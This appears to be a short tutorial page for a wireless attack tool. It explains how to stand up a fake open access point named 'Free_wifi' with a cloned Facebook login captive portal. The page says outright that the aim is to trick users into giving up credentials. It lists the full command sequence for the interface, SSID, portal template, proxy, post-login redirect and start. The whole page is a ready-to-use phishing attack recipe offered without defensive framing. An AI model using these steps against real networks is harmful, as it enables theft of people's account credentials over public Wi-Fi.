Using captive portal attack
Creating a fake access point with an extra captive portal
What can we do using a captive portal?
Basically, do phishing by cloning official login portals and trick or clients to give us credentials or sensitive information.
Configuration

First, we define the SSID (Name of the access point), interface and ignoring pydns_server.

In this case I'll be using a facebook captive portal to trick the users, so to install it just do the following.
use misc.extra_captiveflask
download

Now I'll select the facebook template.
install facebook # simple as that
back

Now we need to choose what proxy we want to use.
In this case we will use the captiveflask proxy.
Just type
set proxy captiveflask

Here in the setting options, I'll type
set captiveflask.force_redirect_to_url https://google.com
This will redirect the user to google.com once he types the requested credentials.

Victims phone

Attackers overview

Commands used
set interface wlan0
set ssid Free_wifi
use misc.extra_captiveflask
download
install facebook # simple as that
back
set proxy captiveflask
set captiveflask.force_redirect_to_url https://google.com
set captiveflask.facebook true
start
Last updated